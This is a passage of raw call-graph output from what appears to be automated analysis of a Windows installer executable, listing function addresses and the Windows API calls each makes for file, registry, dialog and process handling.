3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 